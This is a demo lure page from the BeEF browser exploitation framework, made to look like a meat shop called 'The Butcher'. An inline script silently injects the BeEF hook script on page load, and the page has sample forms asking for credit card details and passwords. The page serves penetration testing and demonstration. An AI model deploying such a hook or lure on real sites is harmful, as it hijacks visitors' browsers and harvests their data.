76 lines
2.7 KiB
HTML
76 lines
2.7 KiB
HTML
<!--
|
|
Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
|
|
Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
See the file 'doc/COPYING' for copying permission
|
|
-->
|
|
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
|
|
"http://www.w3.org/TR/html4/loose.dtd">
|
|
|
|
<html lang="en">
|
|
<head>
|
|
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|
|
<title>The Butcher</title>
|
|
|
|
<link rel="stylesheet" type="text/css" href="butch.css" />
|
|
</head>
|
|
<body>
|
|
<script src="jquery-1.11.3.min.js"></script>
|
|
<script>
|
|
|
|
function showfriends() {
|
|
$("#hamper").hide();
|
|
$("#friends").show();
|
|
}
|
|
|
|
function showHamper() {
|
|
$("#friends").hide();
|
|
$("#hamper").show();
|
|
}
|
|
|
|
</script>
|
|
<script>
|
|
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '<%= @hook_uri %>" type="text/javascript"><\/script>';
|
|
document.write(commandModuleStr);
|
|
</script>
|
|
<div id="content">
|
|
<!-- Awesome Beef Images from: http://www.flickr.com/photos/bulle_de/4657658048/ and http://www.flickr.com/photos/dinesarasota/3944042189/ -->
|
|
<div id="logo">
|
|
<img src="top.jpg" alt="The Butcher" />
|
|
</div>
|
|
<div id="stuff">
|
|
<div class="bigger">
|
|
Welcome to The Butcher, your source of delicious meats. Please feel free to view our samples, sign up to our mailing-list or purchase our special BeEF-hamper!
|
|
</div>
|
|
<div class="normal">
|
|
<button type="button" onclick="showfriends();">Our Meaty Friends</button> <button type="button" onclick="showHamper();">Order Your BeEF-Hamper</button>
|
|
<div id="friends">
|
|
<a href="http://www.beefproject.com">BeEF Project</a><br />
|
|
<a href="http://www.bindshell.net">Bindshell</a><br />
|
|
<a href="http://www.slashdot.org">Slashdot</a><br />
|
|
<a href="http://ha.ckers.org/">ha.ckers.org homepage</a><br />
|
|
</div>
|
|
<div id="hamper">
|
|
<p>Delicious delicious hamper, straight to your door!</p>
|
|
<form method="GET" action="index.html">
|
|
Name: <input type="text" name="yourname" /><br />
|
|
Phone: <input type="text" name="phone" /><br />
|
|
Address: <input type="text" name="address" /><br />
|
|
Credit Card: <input type="text" name="creditcard" /><br />
|
|
<input type="submit" value="Buy buy!" />
|
|
</form>
|
|
<p>Sign up to our mailing list for delicious meats delivered straight to your inbox!</p>
|
|
<form method="GET" action="index.html">
|
|
E-mail: <input type="text" name="yourname" /><br />
|
|
Password: <input type="password" name="password" /><br />
|
|
<input type="submit" value="Sign Up!">
|
|
</form>
|
|
</div>
|
|
</div>
|
|
<div class="smaller">
|
|
Thanks to http://www.flickr.com/photos/bulle_de/ and http://dineSarasota.com for the BeEF images
|
|
</div>
|
|
</div>
|
|
</div>
|
|
</body>
|
|
</html>
|